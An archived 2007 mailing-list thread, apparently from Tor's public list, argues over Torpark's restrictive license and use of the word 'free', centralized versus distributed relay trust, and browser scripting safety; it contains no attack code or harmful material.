> > supposed to be for technical experts and people that hang out in
> > security forums every day then we should continue as is but if Tor is
> > supposed to be for the masses(more people more distributed trust) then
> > there must be a bundle. A package with everything set up for anonymous
> > browsing where some internet newbie can not possibly reveal his IP by
> > misconfiguration. The user clicks the setup program Tor installs, the
> > T

Re: Anonymity through decentralization (was Re: Ultimate solution)

[Arrakis]

Roger,

We have produced a commercial that should help explain the service we
are offering. I have no intention of holding it out as onion routing
unless we switch to onion routing, and I will elaborate on our website
as to how the network works.

Would you be interested in a video that depicts how onion routing
works? I've been toying with the idea of putting one together.

Regards,
Arrakis

> On Sun, Mar 25, 2007 at 09:57:20AM -0600, Arrakis wrote:
>> 2) Torpark is not commercial, it is totally free and open source. We
>> simply offer an upgrade to get higher speeds than the tor network can
>> provide.
>> 
>> 3)  The  fact  that  trust  isn't  distributed  is  a  positive, not a
>> negative,  because you don't have to trust everyone with your outgoing
>> plaintext traffic. We have independent security auditors make sure our
>> admins  are  not tracking anyone or doing anything malicious.

> I'm leaving the licensing discussion alone for now, but I wanted to
> respond to this technical point. Tor's security [1] comes from two
> components. The first is its large and diverse user base -- as the user
> base expands, the mere use of Tor doesn't narrow you down to a specific
> user community or specific few people who are known to have fetched the
> program [2]. The second is the diversity of the relays -- as the Tor
> network expands, fewer adversaries are able to be in enough places on
> the network to succeed at linking senders to recipients.

> Now, it's still an open research question what metrics we should use
> for these components (that is, how exactly we measure the security we
> get from them), but my intuition is that after a certain point the first
> component doesn't contribute much more to security -- meaning in Tor's
> current state, its security grows primarily as the network grows.

> And remember that by "being in enough places", I mean being in a position
> to watch (or otherwise measure [3]) the traffic; the best attacks we know
> right now only look at characteristics of the traffic flow [4], because
> any sort of coordinated compromise of many relays is probably harder.

> I'm not saying Tor's design is perfect. We are still grappling with
> Sybil attack questions, and as you say we need to encourage our users to
> employ end-to-end encryption and authentication when appropriate. And
> we're still not happy that a widely dispersed attacker can probably do
> very well against Tor.

> But a central organization that administers all the relays, even if it
> puts them in different places geographically, and even if it promises to
> do perfect audits and employ only perfect people, aims for a fundamentally
> different sort of security than Tor aims to provide. The traffic analysis
> attacks above are still just as much of a concern, but insider attacks and
> other attacks on/by the organization are now a significant question too.

> You can launch a new single-hop proxy service, commercial or not,
> proprietary or not. You can also launch a multi-hop service where you
> control every hop. And the license of the Tor software lets you use it
> if you find it useful for your purposes. But please don't deceive your
> users by changing the security context and then encouraging them to think
> that just because the Tor software is present somewhere in the picture,
> they are benefitting from the type of security that Tor aims to provide.

> --Roger

> [1] By "security", I'm talking primarily about unlinkability here;
> but that's a different thread.
> [2] http://freehaven.net/anonbib/#usability:weis2006
> [3] http://freehaven.net/anonbib/#torta05
> [4] http://freehaven.net/anonbib/#danezis:pet2004

Re: Ultimate solution

[Paul Syverson]

On Mon, Mar 26, 2007 at 02:44:53PM -0600, Arrakis wrote:
> Paul and Michael,
> 
> Correct.  Apparently  when  something  is free of charge whatever, and
> yours  to do with what you wish unless you are unethical, we call that
> "arrakis-free" or "free as in arrakis".
> 

Or hence "free as the fremen" (sorry couldn't resist).
-Paul

Anonymity through decentralization (was Re: Ultimate solution)

[Roger Dingledine]

On Sun, Mar 25, 2007 at 09:57:20AM -0600, Arrakis wrote:
> 2) Torpark is not commercial, it is totally free and open source. We
> simply offer an upgrade to get higher speeds than the tor network can
> provide.
> 
> 3)  The  fact  that  trust  isn't  distributed  is  a  positive, not a
> negative,  because you don't have to trust everyone with your outgoing
> plaintext traffic. We have independent security auditors make sure our
> admins  are  not tracking anyone or doing anything malicious.

I'm leaving the licensing discussion alone for now, but I wanted to
respond to this technical point. Tor's security [1] comes from two
components. The first is its large and diverse user base -- as the user
base expands, the mere use of Tor doesn't narrow you down to a specific
user community or specific few people who are known to have fetched the
program [2]. The second is the diversity of the relays -- as the Tor
network expands, fewer adversaries are able to be in enough places on
the network to succeed at linking senders to recipients.

Now, it's still an open research question what metrics we should use
for these components (that is, how exactly we measure the security we
get from them), but my intuition is that after a certain point the first
component doesn't contribute much more to security -- meaning in Tor's
current state, its security grows primarily as the network grows.

And remember that by "being in enough places", I mean being in a position
to watch (or otherwise measure [3]) the traffic; the best attacks we know
right now only look at characteristics of the traffic flow [4], because
any sort of coordinated compromise of many relays is probably harder.

I'm not saying Tor's design is perfect. We are still grappling with
Sybil attack questions, and as you say we need to encourage our users to
employ end-to-end encryption and authentication when appropriate. And
we're still not happy that a widely dispersed attacker can probably do
very well against Tor.

But a central organization that administers all the relays, even if it
puts them in different places geographically, and even if it promises to
do perfect audits and employ only perfect people, aims for a fundamentally
different sort of security than Tor aims to provide. The traffic analysis
attacks above are still just as much of a concern, but insider attacks and
other attacks on/by the organization are now a significant question too.

You can launch a new single-hop proxy service, commercial or not,
proprietary or not. You can also launch a multi-hop service where you
control every hop. And the license of the Tor software lets you use it
if you find it useful for your purposes. But please don't deceive your
users by changing the security context and then encouraging them to think
that just because the Tor software is present somewhere in the picture,
they are benefitting from the type of security that Tor aims to provide.

--Roger

[1] By "security", I'm talking primarily about unlinkability here;
but that's a different thread.
[2] http://freehaven.net/anonbib/#usability:weis2006
[3] http://freehaven.net/anonbib/#torta05
[4] http://freehaven.net/anonbib/#danezis:pet2004

Re[2]: Ultimate solution

[Arrakis]

Paul and Michael,

Correct.  Apparently  when  something  is free of charge whatever, and
yours  to do with what you wish unless you are unethical, we call that
"arrakis-free" or "free as in arrakis".

And  to  Kasimir,  the  license  has been updated, and definitions are
forthcoming.

Regards,
Steve

> So the "Torpark" controversy comes down to:
> "Free" == "Yours to do with as you wish" versus
> "Free" == "No charge to use"?

> What are the "official" terms for these two cases?

> And, what's the terms for
> "Source code is available, but usage is restricted" versus
> "Source code is available, usage unrestricted" (same as free #1 above)

Re: Re[2]: Free Software and Torpark (was: Ultimate solution)

[H D Moore]

My employer's product has RFC1314 support for sending exploit traffic ;-) 
http://www.bpointsys.com


-HD

On Monday 26 March 2007 14:18, Michael_google gmail_Gersten wrote:
> I worry about the day that someone actually does follow that RFC,
> wreck havok, and then in court use the defense, "I am following all
> the official standards of the communications network, and if there is
> a problem, it is with the other users who do not observe the
> standards".

Re: Re[2]: Free Software and Torpark (was: Ultimate solution)

[Michael_google gmail_Gersten]

On 3/25/07, Matt Ghali <[EMAIL PROTECTED]> wrote:

Perhaps what you are looking for is full support for RFC 3514.


Was that the "evil bit" RFC?

I worry about the day that someone actually does follow that RFC,
wreck havok, and then in court use the defense, "I am following all
the official standards of the communications network, and if there is
a problem, it is with the other users who do not observe the
standards".

Re: Ultimate solution

[Michael_google gmail_Gersten]

So the "Torpark" controversy comes down to:
"Free" == "Yours to do with as you wish" versus
"Free" == "No charge to use"?

What are the "official" terms for these two cases?

And, what's the terms for
"Source code is available, but usage is restricted" versus
"Source code is available, usage unrestricted" (same as free #1 above)

Re: Ultimate solution

[Freemor]

On Mon, 2007-26-03 at 12:47 -0400, Paul Syverson wrote:

> 
> Yes. I understand what you mean now. But you are misusing 'secure' by
> saying something is not secure if it is not confidential. As an
> imperfect analogy, people sometimes say "home computer" when they are
> really only counting it as a computer if it's a wintel box.
> 
> -Paul

True, I realized that I probably would have avoided a lot of confusion
by choosing more specific terminology. "Secure" is a relative term like
"big" where, to use your example "confidential" describes a much more
specific condition. I shall endevour in the future to stick to more
accurate terms. 

thanks, for bringing it up. I appreciate the input.

Take Care,
Freemor

--

Freemor <[EMAIL PROTECTED]>
Freemor <[EMAIL PROTECTED]>

This e-mail has been digitally signed with GnuPG




signature.asc
Description: This is a digitally signed message part

Re: Ultimate solution

[Paul Syverson]

On Mon, Mar 26, 2007 at 12:16:07PM -0400, Freemor wrote:
> 
> 
> I think the separation is one that exists in my mind. To my thinking TOR
> makes my communication anonymous, but does not make my communications
> secure in that everything is in the clear leaving an exit node. So, if
> I'm wanting secure and anonymous communications I'd have to connect to
> an encrypting endpoint in which case the SSH/TLS/SSL encryption is
> making my data secure while tor is making my communication anonymous.
> 
>   Clearly anonymous+encrypted = more secure then just encrypted. However
> anonymous + easily sniffable by an exit node or anything beyond =
> anonymous but not secure (encrypted). In the latter case I would need to
> be very judicial about what data I transmitted as if any of it were
> identifiable (alone or cumulatively) I will blow the anonymity that TOR
> provides. In the former case this concern is alleviated so long as I
> trust the encrypting endpoint. If I don't trust the encrypting endpoint
> I basically fubar'd 
> 
> That help?

Yes. I understand what you mean now. But you are misusing 'secure' by
saying something is not secure if it is not confidential. As an
imperfect analogy, people sometimes say "home computer" when they are
really only counting it as a computer if it's a wintel box.

-Paul

Re: Ultimate solution

[Paul Syverson]

On Sun, Mar 25, 2007 at 11:56:40AM -0600, Arrakis wrote:
> 
> Saying free and open-source software isn't "Free" and "Open Source" is
> giving  in to a combination of semantics and snobbery of licensing. It
> isn't  as  though  any  organization owns the definition of "Free" and
> "Open  Source"  and has the authority to pin it down to their specific
> hoops we must jump through, nor should anyone assume we have.
> 

There are (at least) two things going on through this discussion that
are run together and should be separated. 'Free' and 'open source'
have long ago become technical terms in the context of software and
programs. Technical terms allow a community to agree on some things so
that it is not necessary to spend many paragraphs explaining
terminology every time one wants to say something. This does not rob
the terms of their broader meaning.  And people can use the terms as
they wish, but if they have a discussion in a context for which the
terms have specific meaning, then they should expect to be
misunderstood and yelled at a lot for confusing people and wasting
their time. And, if they refuse to conform to the vocabulary of the
community they can expect to eventually be simply dismissed as too
much trouble to deal with. I would be subject to the same criticism if
I started talking about free algebra, free groups, free variables,
etc. using 'free' in some nonstandard way and simply insisting that it
is correct.

One can of course question the standard usage that has arisen and give
arguments why other ways of speaking are more appropriate. But that is
a topic for a forum where there is discussion about the basic meaning
of those terms, not in a context where they are simply assumed and
used, such as this one.

Arrakis can do what he wishes with his software. If he calls it free
software in a broader population, well it will be interpreted however
it will.  But, if he calls it free software in a software development
forum, he is simply misusing an established term. But, after one or
two posts, the meaning of "free" is off-topic for this forum and
should be taken to one where it is appropriate.  (People may also then
get angry that the public will be misled and run together things that
are not the same at all. This happens all the time when science hits
the broader world. It is also part of what is going on here.)

If it is important to continue a discussion of the different types
of licenses that Tor software or other related software is under, e.g.,
because it affects decisions about further development and distribution
of that software, then fights over the correct meaning of 'free' should
be taken elsewhere. We can for these purposes adopt something like
standard-free and arrakis-free for these discussions without quibbling
over which of them is really free.

-Paul 

(P.S. For more, please see my critical analysis of that moving
treatise on the impact of Frege's Begriffsschrift in the years
after the American Civil War,  _Freedom's Lament: A History of the
Bound Variable in America_. )

Re: Ultimate solution

[Freemor]

> I'm even more confused. Are you saying anonymity is not a security
> property? By "security" are you limiting yourself to confidentiality?
> There are many aspects of security, rarely all addressed at once by
> any system. One of these is anonymity, which is why one finds
> anonymity as a listed topic in the CFP of virtually every major
> computer security conference.
> 
> -Paul
> 

Yes anonymity is a type of security and an important one. TOR makes me
anonymous it make the data transmission secure up to the point on the
exit node, it helps to prevent traffic analysis etc. all of the are
security properties. 

I think the separation is one that exists in my mind. To my thinking TOR
makes my communication anonymous, but does not make my communications
secure in that everything is in the clear leaving an exit node. So, if
I'm wanting secure and anonymous communications I'd have to connect to
an encrypting endpoint in which case the SSH/TLS/SSL encryption is
making my data secure while tor is making my communication anonymous.

  Clearly anonymous+encrypted = more secure then just encrypted. However
anonymous + easily sniffable by an exit node or anything beyond =
anonymous but not secure (encrypted). In the latter case I would need to
be very judicial about what data I transmitted as if any of it were
identifiable (alone or cumulatively) I will blow the anonymity that TOR
provides. In the former case this concern is alleviated so long as I
trust the encrypting endpoint. If I don't trust the encrypting endpoint
I basically fubar'd 

That help?
Freemor

--

Freemor <[EMAIL PROTECTED]>
Freemor <[EMAIL PROTECTED]>

This e-mail has been digitally signed with GnuPG




signature.asc
Description: This is a digitally signed message part

Re: Ultimate solution

[Paul Syverson]

On Sat, Mar 24, 2007 at 11:34:47AM -0400, Freemor wrote:
> On Sat, 2007-24-03 at 08:52 -0400, Paul Syverson wrote:
> > On Sat, Mar 24, 2007 at 12:50:15AM -0400, Freemor wrote:
> > > 
> > > P.s. to the tor Dev's -- Yes, I know TOR is not a security application.
> > > That just snuck in there as I deal with computer security regularly and
> > > often see the same "the computer/internet/isp/mysterious someone" should
> > > take care of that for me mentality.   
> > > 
> > 
> > I don't understand this statement. Tor was reasearched and developed
> > by and for the US DoD as an onion routing project, the explicit purpose
> > of which is security for DoD and other communications:
> > traffic analysis resistance, DoS resistance, personnel protection,
> > etc.
> > 
> > -Paul
> 
> I can see your point and TOR does have some security applications if
> used in properly and with those goals in mind. (i.e. only connecting to
> https or other encrypted endpoints). The main goal of TOR is clearly
> anonymity. If the main goal was security having data leave the exit
> nodes in the clear would be a definite no no. I was also just being
> clear that I did not think of TOR as a
> firewall/antivirus/anti-malware/etc system when I used the term
> Security. 
> 

I'm even more confused. Are you saying anonymity is not a security
property? By "security" are you limiting yourself to confidentiality?
There are many aspects of security, rarely all addressed at once by
any system. One of these is anonymity, which is why one finds
anonymity as a listed topic in the CFP of virtually every major
computer security conference.

-Paul

Re: Free Software and Torpark (was: Ultimate solution)

[Brad Freeman]

On 25 mar 2007, at 22.48, H D Moore wrote:

This is a stupid argument to start with -- ignoring the license,  
TorPark
should be recommended based on the quality of the code and the  
features
of the software. If TorPark LLC does something evil at a later  
date, stop

recommending them.

-HD


Amen, Preach it Brother HD!

Brad

Re: Ultimate solution

[Brad Freeman]

On 25 mar 2007, at 21.16, Michael_google gmail_Gersten wrote:


The whole "Because some aspect of Flash can kill you, all of flash
must be junked" approach won't work. That's like saying, "Because Java
could contain an unsafe program, no Java can be used".


Or like saying "Because SOME people are using Tor for bad things, we  
need to get rid of Tor."


Brad

Re[2]: Free Software and Torpark (was: Ultimate solution)

[Matt Ghali]

Perhaps what you are looking for is full support for RFC 3514.

Best of luck.

matto


On Sun, 25 Mar 2007, Arrakis wrote:


Let  us  not be ambigious about the "users" you are talking about. The
specific  "users"  you  are talking about are limited by definition to
only  be  the ones wanting to modify it to include malware/trojans, or
someone  trying  to  turn it into a commercial application, or an evil
government  that  does not abide by the universal declaration of human
rights.  Anyone  who  falls  under  one of those three definitions who
can't consider it free, I'm not concerned about. To _all_ other users,
it  is  free  and open source, and they can do what they want with it,
and modify and distribute it how they please.



[EMAIL PROTECTED]<
  Moral indignation is a technique to endow the idiot with dignity.
- Marshall McLuhan

Re[2]: Free Software and Torpark (was: Ultimate solution)

[Arrakis]

I'll address these issues since you didn't feel it was
necessary to read the followups on the thread you posted:

1) tor devs are not qualified to review the code. Shava Nerad of the
Tor project  asked me to refer someone to do QA on 3rd party win32 apps for the 
Tor
project, which I did. Will it ever happen? Who knows.

2) Those are not issues with Torpark but the windows operating system.
However, in a future release of Torpark we are working on even the
faults of the win os will be addressed. Those issues are 1) the way
windows treats memory, and 2) the way windows treats applications and
may cache them. Since then I have removed the section about it not
leaving traces, because it simply does as that is the nature of
windows.

3)  I have a step by step for building Torpark. Further, If you bother
to read the code, you will see it is well documented.

Regards,
Steve


> TorPark is not recommended by any Tor devs or others
> working with/on Tor.

> TorPark has some unresolved issues:
> .

> And it is not documented well.

> Regards,



>  
> 
> Now that's room service!  Choose from over 150,000 hotels
> in 45,000 destinations on Yahoo! Travel to find your fit.
> http://farechase.yahoo.com/promo-generic-14795097

Re: Free Software and Torpark (was: Ultimate solution)

[light zoo]

--- H D Moore <[EMAIL PROTECTED]> wrote:

> On Sunday 25 March 2007 14:06, Fabian Keil wrote:
> > ...TorPark should be recommended based on the
> quality of the code and the features of the
> software. If TorPark LLC does something evil
> at a later date, stop recommending them.
> 
> -HD

TorPark is not recommended by any Tor devs or others
working with/on Tor.

TorPark has some unresolved issues:
.

And it is not documented well.

Regards,



 

Now that's room service!  Choose from over 150,000 hotels
in 45,000 destinations on Yahoo! Travel to find your fit.
http://farechase.yahoo.com/promo-generic-14795097

Re: Free Software and Torpark (was: Ultimate solution)

[Philippe Gauthier]

> Once  again,  would  anyone else like to see Tor's license add that it
> can't  be  modified  to  have malware, trojans, spyware, etc. injected
> into it?

-1

Re[4]: Free Software and Torpark (was: Ultimate solution)

[Arrakis]

Kasimir,

You are right, I think that is too broad and I will ask that the
license give more precise definitions. It was to include
anonymity/proxy services, I'll make sure it gets revised.

Regards,
Arrakis

> It would be good if I could read, I am sorry for posting that I saw
> the license as free.  Reading through it fully, it definitely is not.

> The terms of the license are way too broad.  Trying to exclude malware
> and spyware by licensing the program under a license which states that
> it cannot be used to anything that restricts the rights of the user
> will not work.  First of all, malware does not restrict the rights of
> the user.  Second of all, malware doesn't care about licenses, and the
> creators of much of the spyware and malware are not known to the
> world, so even if they break this license nothing will happen to them.

> Another thing that doesn't really make sense to me about the license
> is that it restricts the right to modify the program if it uses a
> commercial "connectivity service".  I am not a lawyer, but isn't my
> ISP a commercial "connectivity service"?  It seems to me that this
> program cannot be redistributed at all, because it can only be used
> with a commercial "connectivity service", and therefore any
> modification will break the license.

> I take back what I said earlier, and I am sorry for causing so many
> people to stare at their monitor in disbelief from what they just
> read.

> My most humble apologies,
> Kasimir

> On 3/25/07, Arrakis <[EMAIL PROTECTED]> wrote:
>> Fabian et al,
>>
>> > The terms "free software" and "open source software" have been
>> > around for a while and so has there meaning. No one said Torpark
>> > wasn't delivered free of charge or that its source wasn't open for
>> > review.
>>
>> > Torpark's license just doesn't give the user enough rights to
>> > call Torpark either free software or open source software
>> > without causing confusion, raised eyebrows or being laughed at.
>>
>> Let  us  not be ambigious about the "users" you are talking about. The
>> specific  "users"  you  are talking about are limited by definition to
>> only  be  the ones wanting to modify it to include malware/trojans, or
>> someone  trying  to  turn it into a commercial application, or an evil
>> government  that  does not abide by the universal declaration of human
>> rights.  Anyone  who  falls  under  one of those three definitions who
>> can't consider it free, I'm not concerned about. To _all_ other users,
>> it  is  free  and open source, and they can do what they want with it,
>> and modify and distribute it how they please.
>>
>> The  distinction you are attempting to make anti-thetical to security.
>> Somehow I just can't see my way clear to advocating modification of my
>> software  for the use of spyware and commercial competitors. I fail to
>> see  what  legitimate  interest  you  or  anyone  else have in keeping
>> software  from  being  legally  protected  against  having trojans and
>> malware inject into them, and still considering it free.
>>
>> Instead of attacking my usage of free because it causes some cognitive
>> dissonance,  you  may  consider  asking  why  other  licenses  haven't
>> restricted  use  of  their terms from having malware injected into it.
>> Especially  a  project like Tor. Personally, I don't mind if a license
>> causes  a  little  more  confusion  to big brother, xyz proxy corp, or
>> spyware inc, or anyone, if I and my users get more protection. I would
>> certainly like to see that in the Tor license.
>>
>> > So  it's  totally free, except that it isn't. You're also not giving
>> > it  away  to the public, you're only giving it to those parts of the
>> > public you don't discriminate against.
>>
>> No, it is free to the public, we aren't discriminating against who can
>> use it. We ARE restricting how it can be MODIFIED.
>>
>> > ... and the people who currently don't use Torpark because it isn't
>> > free software and the people who don't care about Torpark itself but
>> > would appreciate it if the term "free software" wouldn't be watered
>> > down.
>>
>> Fabian,  if  there  really are legitimate potential users out there in
>> the  cosmos,  waiting  for  me to open it up to malware and trojans so
>> they  can  feel  the  universal  definition of "Free" is consistent to
>> whatever  culture  they happen to be from, they can keep holding their
>> breath.  And  to  the  others  who  don't care enough except to make a
>> pedantic  distinction,  I'll  be  expecting  a  letter  from  the  FSF
>> regarding how they own the trademark "Free".
>>
>> Once  again,  would  anyone else like to see Tor's license add that it
>> can't  be  modified  to  have malware, trojans, spyware, etc. injected
>> into it?
>>
>>
>> Regards,
>> Steve
>>
>>

Re: Free Software and Torpark (was: Ultimate solution)

[H D Moore]

On Sunday 25 March 2007 14:06, Fabian Keil wrote:
> ... and the people who currently don't use Torpark because it isn't
> free software and the people who don't care about Torpark itself but
> would appreciate it if the term "free software" wouldn't be watered
> down.

Watered down? C'mon. Do a google search for "free software". At least half 
of the results refer to software that is "free as in beer" vs "free as in 
speech". If you want to show the difference between "free" and "Free", 
capitalize it like everyone else. Just because something isn't "Free" 
doesn't mean you have to pay for it.

Speaking of freedom, what about a giving a software developer the freedom 
to prevent commercial abuse? Would you prefer to give them the "Freedom" 
to stop working on their software because they don't want it ripped off 
by scumbags?

>Torpark's license just doesn't give the user enough rights to
>call Torpark either free software or open source software
>without causing confusion, raised eyebrows or being laughed at.

I argue that anyone trying to redefine the english word "free" to only 
mean software licensed according to the FSF guidelines deserves to be 
laughed at.

This is a stupid argument to start with -- ignoring the license, TorPark 
should be recommended based on the quality of the code and the features 
of the software. If TorPark LLC does something evil at a later date, stop 
recommending them.

-HD

Re: Re[2]: Free Software and Torpark (was: Ultimate solution)

[Kasimir Gabert]

It would be good if I could read, I am sorry for posting that I saw
the license as free.  Reading through it fully, it definitely is not.

The terms of the license are way too broad.  Trying to exclude malware
and spyware by licensing the program under a license which states that
it cannot be used to anything that restricts the rights of the user
will not work.  First of all, malware does not restrict the rights of
the user.  Second of all, malware doesn't care about licenses, and the
creators of much of the spyware and malware are not known to the
world, so even if they break this license nothing will happen to them.

Another thing that doesn't really make sense to me about the license
is that it restricts the right to modify the program if it uses a
commercial "connectivity service".  I am not a lawyer, but isn't my
ISP a commercial "connectivity service"?  It seems to me that this
program cannot be redistributed at all, because it can only be used
with a commercial "connectivity service", and therefore any
modification will break the license.

I take back what I said earlier, and I am sorry for causing so many
people to stare at their monitor in disbelief from what they just
read.

My most humble apologies,
Kasimir

On 3/25/07, Arrakis <[EMAIL PROTECTED]> wrote:

Fabian et al,

> The terms "free software" and "open source software" have been
> around for a while and so has there meaning. No one said Torpark
> wasn't delivered free of charge or that its source wasn't open for
> review.

> Torpark's license just doesn't give the user enough rights to
> call Torpark either free software or open source software
> without causing confusion, raised eyebrows or being laughed at.

Let  us  not be ambigious about the "users" you are talking about. The
specific  "users"  you  are talking about are limited by definition to
only  be  the ones wanting to modify it to include malware/trojans, or
someone  trying  to  turn it into a commercial application, or an evil
government  that  does not abide by the universal declaration of human
rights.  Anyone  who  falls  under  one of those three definitions who
can't consider it free, I'm not concerned about. To _all_ other users,
it  is  free  and open source, and they can do what they want with it,
and modify and distribute it how they please.

The  distinction you are attempting to make anti-thetical to security.
Somehow I just can't see my way clear to advocating modification of my
software  for the use of spyware and commercial competitors. I fail to
see  what  legitimate  interest  you  or  anyone  else have in keeping
software  from  being  legally  protected  against  having trojans and
malware inject into them, and still considering it free.

Instead of attacking my usage of free because it causes some cognitive
dissonance,  you  may  consider  asking  why  other  licenses  haven't
restricted  use  of  their terms from having malware injected into it.
Especially  a  project like Tor. Personally, I don't mind if a license
causes  a  little  more  confusion  to big brother, xyz proxy corp, or
spyware inc, or anyone, if I and my users get more protection. I would
certainly like to see that in the Tor license.

> So  it's  totally free, except that it isn't. You're also not giving
> it  away  to the public, you're only giving it to those parts of the
> public you don't discriminate against.

No, it is free to the public, we aren't discriminating against who can
use it. We ARE restricting how it can be MODIFIED.

> ... and the people who currently don't use Torpark because it isn't
> free software and the people who don't care about Torpark itself but
> would appreciate it if the term "free software" wouldn't be watered
> down.

Fabian,  if  there  really are legitimate potential users out there in
the  cosmos,  waiting  for  me to open it up to malware and trojans so
they  can  feel  the  universal  definition of "Free" is consistent to
whatever  culture  they happen to be from, they can keep holding their
breath.  And  to  the  others  who  don't care enough except to make a
pedantic  distinction,  I'll  be  expecting  a  letter  from  the  FSF
regarding how they own the trademark "Free".

Once  again,  would  anyone else like to see Tor's license add that it
can't  be  modified  to  have malware, trojans, spyware, etc. injected
into it?


Regards,
Steve





--
Kasimir Gabert

Re[2]: Ultimate solution

[Arrakis]

Michael,

Well that sounds good in theory, and admittedly I don't know enough
about scripting languages to say it can't be done. But it does occur
to me that the SM would have to be very intelligent to know that the
harmless X, Y, and Z parts of the script form a dangerous whole. I
think that starts entering into heuristics. Surely someone here knows
way more about this and will comment. I would love to see such a tool.

Regards,
Steve


>>   In my experience many users will, and do, go out of their way to
>> circumvent their own protection unless very aware of the consequences,
>> and sometimes even then. If they really want to see that funny flash
>> animation on a certain site, they will find a way to do it and then
>> often forget to undo the changes they made there by leaving they selves
>> vulnerable.

> There are some aspects of Flash, Javascript, etc, that are safe, and
> do not reveal any information. There are other aspects that are
> unsafe.

> This gets back to the whole issue I raised earlier, in another thread.
> Why try to sell people on "OK, but you need to use a completely
> stripped down browser that can't display most modern sites at all
> because all scripting systems are disabled"? Why not use a "security
> manager" model, where the browser commands are verified by a separate
> security manager, configured by the user? Then Tor can just distribute
> a security manager file.

> This would require some sort of system for "I'm the browser, this is
> the file I just downloaded, tell me what I can safely execute". "I'm
> the javascript parser, this is what I've just parsed and written via
> document.write but not yet executed. Tell me what I can safely
> execute". "I'm the browser, this is the full document after fetching
> all the embedded references. I know I've asked you on each of those
> parts separately, now here's the whole shebang. Tell me what I can
> safely execute." Etc.

> The whole "Because some aspect of Flash can kill you, all of flash
> must be junked" approach won't work. That's like saying, "Because Java
> could contain an unsafe program, no Java can be used". Sun designed a
> security manager system into Java specifically to deal with that
> concern. If the default security manager isn't good enough -- if the
> default SM permits unproxied connections, for example -- then we need
> a new SM that does not permit unproxied connections, or forces them to
> become proxied without the code realizing it.

> Java does permit changing the SM, doesn't it?

> Why not implement one for the rest of the browsing experience?

Re[2]: Free Software and Torpark (was: Ultimate solution)

[Arrakis]

Fabian et al,

> The terms "free software" and "open source software" have been
> around for a while and so has there meaning. No one said Torpark
> wasn't delivered free of charge or that its source wasn't open for
> review.

> Torpark's license just doesn't give the user enough rights to
> call Torpark either free software or open source software
> without causing confusion, raised eyebrows or being laughed at.

Let  us  not be ambigious about the "users" you are talking about. The
specific  "users"  you  are talking about are limited by definition to
only  be  the ones wanting to modify it to include malware/trojans, or
someone  trying  to  turn it into a commercial application, or an evil
government  that  does not abide by the universal declaration of human
rights.  Anyone  who  falls  under  one of those three definitions who
can't consider it free, I'm not concerned about. To _all_ other users,
it  is  free  and open source, and they can do what they want with it,
and modify and distribute it how they please.

The  distinction you are attempting to make anti-thetical to security.
Somehow I just can't see my way clear to advocating modification of my
software  for the use of spyware and commercial competitors. I fail to
see  what  legitimate  interest  you  or  anyone  else have in keeping
software  from  being  legally  protected  against  having trojans and
malware inject into them, and still considering it free.

Instead of attacking my usage of free because it causes some cognitive
dissonance,  you  may  consider  asking  why  other  licenses  haven't
restricted  use  of  their terms from having malware injected into it.
Especially  a  project like Tor. Personally, I don't mind if a license
causes  a  little  more  confusion  to big brother, xyz proxy corp, or
spyware inc, or anyone, if I and my users get more protection. I would
certainly like to see that in the Tor license.

> So  it's  totally free, except that it isn't. You're also not giving
> it  away  to the public, you're only giving it to those parts of the
> public you don't discriminate against.

No, it is free to the public, we aren't discriminating against who can
use it. We ARE restricting how it can be MODIFIED.

> ... and the people who currently don't use Torpark because it isn't
> free software and the people who don't care about Torpark itself but
> would appreciate it if the term "free software" wouldn't be watered
> down.

Fabian,  if  there  really are legitimate potential users out there in
the  cosmos,  waiting  for  me to open it up to malware and trojans so
they  can  feel  the  universal  definition of "Free" is consistent to
whatever  culture  they happen to be from, they can keep holding their
breath.  And  to  the  others  who  don't care enough except to make a
pedantic  distinction,  I'll  be  expecting  a  letter  from  the  FSF
regarding how they own the trademark "Free".

Once  again,  would  anyone else like to see Tor's license add that it
can't  be  modified  to  have malware, trojans, spyware, etc. injected
into it?


Regards,
Steve

Re: Ultimate solution

[Michael_google gmail_Gersten]

  In my experience many users will, and do, go out of their way to
circumvent their own protection unless very aware of the consequences,
and sometimes even then. If they really want to see that funny flash
animation on a certain site, they will find a way to do it and then
often forget to undo the changes they made there by leaving they selves
vulnerable.


There are some aspects of Flash, Javascript, etc, that are safe, and
do not reveal any information. There are other aspects that are
unsafe.

This gets back to the whole issue I raised earlier, in another thread.
Why try to sell people on "OK, but you need to use a completely
stripped down browser that can't display most modern sites at all
because all scripting systems are disabled"? Why not use a "security
manager" model, where the browser commands are verified by a separate
security manager, configured by the user? Then Tor can just distribute
a security manager file.

This would require some sort of system for "I'm the browser, this is
the file I just downloaded, tell me what I can safely execute". "I'm
the javascript parser, this is what I've just parsed and written via
document.write but not yet executed. Tell me what I can safely
execute". "I'm the browser, this is the full document after fetching
all the embedded references. I know I've asked you on each of those
parts separately, now here's the whole shebang. Tell me what I can
safely execute." Etc.

The whole "Because some aspect of Flash can kill you, all of flash
must be junked" approach won't work. That's like saying, "Because Java
could contain an unsafe program, no Java can be used". Sun designed a
security manager system into Java specifically to deal with that
concern. If the default security manager isn't good enough -- if the
default SM permits unproxied connections, for example -- then we need
a new SM that does not permit unproxied connections, or forces them to
become proxied without the code realizing it.

Java does permit changing the SM, doesn't it?

Why not implement one for the rest of the browsing experience?

Re: Free Software and Torpark (was: Ultimate solution)

[Fabian Keil]

Arrakis <[EMAIL PROTECTED]> wrote:

> Saying free and open-source software isn't "Free" and "Open Source" is
> giving  in to a combination of semantics and snobbery of licensing.

The terms "free software" and "open source software" have been
around for a while and so has there meaning. No one said Torpark
wasn't delivered free of charge or that its source wasn't open for
review.

Torpark's license just doesn't give the user enough rights to
call Torpark either free software or open source software
without causing confusion, raised eyebrows or being laughed at.

> The source is totally free, and that isn't "Free" but free, _except_ I
> don't allow for other commercial services to rip it off and use it for
> their  personal  gain since I am giving it away to the public, and you
> can't install tracking/spyware/malware in it and then redistribute it.

So it's totally free, except that it isn't. You're also not giving it
away to the public, you're only giving it to those parts of the
public you don't discriminate against.

> Those  are  pretty  much  the  only restrictions. Perhaps GPL fanatics
> think  I  owe  it  to spyware manufacturers, or I need to give away my
> intellectual  property to every 3rd-rate commercial anonymity service?
> The  bottom  line  is, everyone benefits by these restrictions, except
> for malware manufacturers and commercial anonymity services.

... and the people who currently don't use Torpark because it isn't
free software and the people who don't care about Torpark itself but
would appreciate it if the term "free software" wouldn't be watered
down.

Fabian


signature.asc
Description: PGP signature

Re: Re[2]: Ultimate solution

[H D Moore]

Correct URL is:
 - http://metasploit.com/confs/fosdem2007/economics.pdf

-HD

On Sunday 25 March 2007 11:42, H D Moore wrote:
